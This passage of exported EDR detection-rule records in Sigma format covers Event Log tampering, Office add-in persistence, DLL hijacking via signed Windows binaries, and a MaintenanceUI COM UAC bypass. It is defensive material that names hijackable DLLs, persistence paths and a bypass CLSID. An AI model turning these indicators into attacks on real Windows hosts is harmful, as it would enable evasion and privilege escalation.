'?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Bitdefender\\\\* 
Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\KernelBase.dll+'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\ntdll.dll+'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\KernelBase.dll+'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\ntdll.dll+'\n exclusion_bitdefender_injection_32:\n CallTrace|contains:\n # \\Bitdefender\\Endpoint Security\\ and \\Bitdefender\\Bitdefender Security\\\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000????????)|'\n - 
'|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000????????)|'\n\n exclusion_zenworks:\n ProcessImage: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenNotifyIcon.exe'\n\n exclusion_dict:\n ProcessImage: '?:\\Program Files (x86)\\DicT\\Fichiers Communs\\DicT.exe'\n\n exclusion_tasklist_module:\n ProcessImage:\n - '?:\\Windows\\System32\\tasklist.exe'\n - '?:\\Windows\\Syswow64\\tasklist.exe'\n # C:\\Windows\\system32\\tasklist.exe /M LenovoBatteryGaugePackage.dll\n ProcessCommandLine: '*tasklist* /M *.dll'\n GrantedAccess: '0x1fffff'\n\n exclusion_java:\n ProcessImage: '*\\runtime\\jre\\bin\\java.exe'\n CallTrace|contains: 'runtime\\jre\\bin\\client\\jvm.dll'\n\n exclusion_topaz_ofd:\n ProcessImage: '?:\\Program Files\\Topaz OFD\\Warsaw\\core.exe'\n\n exclusion_superantispyware:\n ProcessOriginalFileName: 'SUPERAntiSpyware.exe'\n\n exclusion_razer:\n ProcessImage: '?:\\Program Files (x86)\\Razer\\Razer Cortex\\RazerCortex.exe'\n\n exclusion_dnspy:\n ProcessImage: '*\\dnSpy.exe'\n ProcessInternalName: 'dnSpy.dll'\n ProcessOriginalFileName: 'dnSpy.dll'\n\n exclusion_controlup_signed:\n ProcessImage: '*\\cuAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ControlUp, Inc.'\n exclusion_controlup_unsigned:\n ProcessImage: '?:\\Program Files\\Smart-X\\ControlUpAgent\\Version *\\cuAgent.exe'\n ProcessOriginalFileName: 'cuAgent.exe'\n\n exclusion_hpdia:\n ProcessImage|endswith: '\\HPDIA.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'HP Inc.'\n\n exclusion_archestra:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\ArchestrA\\Install\\{????????-????-????-????-????????????}\\FormLoader.exe'\n - '?:\\Program Files 
(x86)\\Common Files\\ArchestrA\\Install\\{????????-????-????-????-????????????}\\FormLoader.exe'\n\n exclusion_coraactivite:\n ProcessImage: '?:\\Program Files (x86)\\CORA\\\\*\\CoRa Activite\\CORA_Activite.exe'\n ProcessCompany: 'Maincare Solutions'\n\n exclusion_mediqual:\n ProcessImage:\n - '?:\\Program Files\\Mediqual7\\MediFrameWork.exe'\n - '?:\\Program Files (x86)\\Mediqual7\\MediFrameWork.exe'\n ProcessOriginalFileName: 'MediFrameWork.exe'\n\n exclusion_veeam:\n ProcessOriginalFileName: 'Veeam.Setup.Wizard.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Veeam Software Group GmbH'\n\n exclusion_adguard:\n ProcessOriginalFileName: 'AdguardSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Adguard Software Limited'\n\n exclusion_lenovo_2:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\Lenovo\\Lenovo Service Bridge\\LSB.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Lenovo (Beijing) Limited'\n\n exclusion_teams:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n\n exclusion_inuit:\n ProcessImage:\n - '?:\\Program Files\\Intuit\\QuickBooks Desktop File Doctor\\QBFDT.exe'\n - '?:\\Program Files (x86)\\Intuit\\QuickBooks Desktop File Doctor\\QBFDT.exe'\n\n exclusion_imagine_editions:\n ProcessImage:\n - '?:\\program files\\imagine editions\\hdupdate\\hdupdate.exe'\n - '?:\\program files (x86)\\imagine editions\\hdupdate\\hdupdate.exe'\n\n exclusion_werfault1:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n exclusion_werfault2:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessGrandparentImage: '?:\\Program Files\\Siemens\\syngo\\bin\\syngo.Common.Starter.exe'\n\n 
exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n condition: selection_base and 1 of selection_variant_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "368a9015-91da-4e88-9611-4dd3cf5e001c",
"rule_name": "Windows Event Log Svchost Process Suspiciously Accessed",
"rule_description": "Detects an attempt to open an svchost process in a similar way to Phant0m in order to kill or suspend the threads of the Windows Event Log service.\nAttackers may try to tamper with the Event Log service to prevent it from reporting malicious activities to logging or EDR solutions.\nIt is recommended to investigate the process accessing the Event Log to look for malicious content or actions and to investigate any subsequent suspicious activities on the host.\n",
"rule_creation_date": "2021-06-21",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "368a9f20-42e6-4ede-af88-85a899503dea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621536Z",
"creation_date": "2026-03-23T11:45:34.621538Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621543Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/StopMalvertisin/status/1575195280193880064",
"https://pentestlab.blog/2019/12/11/persistence-office-application-startup/",
"https://attack.mitre.org/techniques/T1137/006/"
],
"name": "t1137_006_office_application_addin_startup.yml",
"content": "title: Possible Persistence via Office Application Addin Startup\nid: 368a9f20-42e6-4ede-af88-85a899503dea\ndescription: |\n Detects the installation of a new Office addin in the application's startup folder.\n This method has been used by attackers to achieve persistence since the addin is executed each time the application launches.\n It is recommended to investigate the process that created the file for suspicious activities.\nreferences:\n - https://twitter.com/StopMalvertisin/status/1575195280193880064\n - https://pentestlab.blog/2019/12/11/persistence-office-application-startup/\n - https://attack.mitre.org/techniques/T1137/006/\ndate: 2022/09/29\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.006\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection_file_startup:\n Path|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\'\n Path|contains: '.xls'\n\n selection_file_addins:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\'\n Path|contains:\n - '.wll'\n - '.wla'\n - '.xll'\n - '.xla'\n - '.xls'\n - '.dll'\n - '.ppa'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_tmp:\n 
TargetFilename|endswith: '\\~$*'\n\n exclusion_ivanti:\n ProcessProcessName: 'pfwsmgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Citrix Systems, Inc.'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "368a9f20-42e6-4ede-af88-85a899503dea",
"rule_name": "Possible Persistence via Office Application Addin Startup",
"rule_description": "Detects the installation of a new Office addin in the application's startup folder.\nThis method has been used by attackers to achieve persistence since the addin is executed each time the application launches.\nIt is recommended to investigate the process that created the file for suspicious activities.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36a9ea38-0c3a-4f1e-b5bb-2cd452aeb315",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592118Z",
"creation_date": "2026-03-23T11:45:34.592122Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://web.archive.org/web/20221117081846/https://dec0ne.github.io/research/2022-11-14-Undetected-Lsass-Dump-Workflow/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_imagingdevices.yml",
"content": "title: DLL Hijacking via ImagingDevices.exe\nid: 36a9ea38-0c3a-4f1e-b5bb-2cd452aeb315\ndescription: |\n Detects potential Windows DLL Hijacking via ImagingDevices.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://web.archive.org/web/20221117081846/https://dec0ne.github.io/research/2022-11-14-Undetected-Lsass-Dump-Workflow/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ImagingDevices.cpl'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Photo Viewer\\'\n - '?:\\Program Files\\Windows Photo Viewer\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Windows Photo Viewer\\'\n - '?:\\Program Files\\Windows Photo Viewer\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36a9ea38-0c3a-4f1e-b5bb-2cd452aeb315",
"rule_name": "DLL Hijacking via ImagingDevices.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ImagingDevices.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36c25c46-b03d-4900-992d-5959ebd72151",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092167Z",
"creation_date": "2026-03-23T11:45:34.092169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092174Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/0xcarnage/status/1203882560176218113",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sessionmsg.yml",
"content": "title: DLL Hijacking via SessionMsg.exe\nid: 36c25c46-b03d-4900-992d-5959ebd72151\ndescription: |\n Detects potential Windows DLL Hijacking via SessionMsg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/0xcarnage/status/1203882560176218113\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SessionMsg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\duser.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36c25c46-b03d-4900-992d-5959ebd72151",
"rule_name": "DLL Hijacking via SessionMsg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SessionMsg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36f7b22d-7249-442b-9be5-8c10c81df207",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077628Z",
"creation_date": "2026-03-23T11:45:34.077630Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077634Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/zcgonvh/TaskSchedulerMisc/blob/master/schuac.cs",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_com_maintenanceui.yml",
"content": "title: UAC Bypass via Virtual Factory for MaintenanceUI\nid: 36f7b22d-7249-442b-9be5-8c10c81df207\ndescription: |\n Detects the execution of the MaintenanceUI COM interface.\n This COM interface could be used to bypass User Account Control by creating a scheduled task executing a command with high privileges.\n It is recommended to check for the execution of suspicious scheduled tasks with high privileges shortly after dllhost execution with the help of the related timeline.\nreferences:\n - https://github.com/zcgonvh/TaskSchedulerMisc/blob/master/schuac.cs\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n # https://strontic.github.io/xcyclopedia/library/clsid_A6BFEA43-501F-456F-A845-983D3AD7B8F0.html\n ProcessCommandLine|contains: 'A6BFEA43-501F-456F-A845-983D3AD7B8F0'\n ProcessImage: '?:\\Windows\\System32\\dllhost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36f7b22d-7249-442b-9be5-8c10c81df207",
"rule_name": "UAC Bypass via Virtual Factory for MaintenanceUI",
"rule_description": "Detects the execution of the MaintenanceUI COM interface.\nThis COM interface could be used to bypass User Account Control by creating a scheduled task executing a command with high privileges.\nIt is recommended to check for the execution of suspicious scheduled tasks with high privileges shortly after dllhost execution with the help of the related timeline.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3711f25e-4a48-4624-bed7-1c0cf1b9f994",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081946Z",
"creation_date": "2026-03-23T11:45:34.081948Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081952Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msconfig.yml",
"content": "title: DLL Hijacking via msconfig.exe\nid: 3711f25e-4a48-4624-bed7-1c0cf1b9f994\ndescription: |\n Detects potential Windows DLL Hijacking via msconfig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msconfig.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\mfc42u.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3711f25e-4a48-4624-bed7-1c0cf1b9f994",
"rule_name": "DLL Hijacking via msconfig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msconfig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3712739d-e5f9-426a-9faa-810b9f71a278",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587345Z",
"creation_date": "2026-03-23T11:45:34.587348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587356Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://cyberark-customers.force.com/s/article/Receiving-a-vf-host-error-upon-login-for-Win-10-machines",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vfhost.yml",
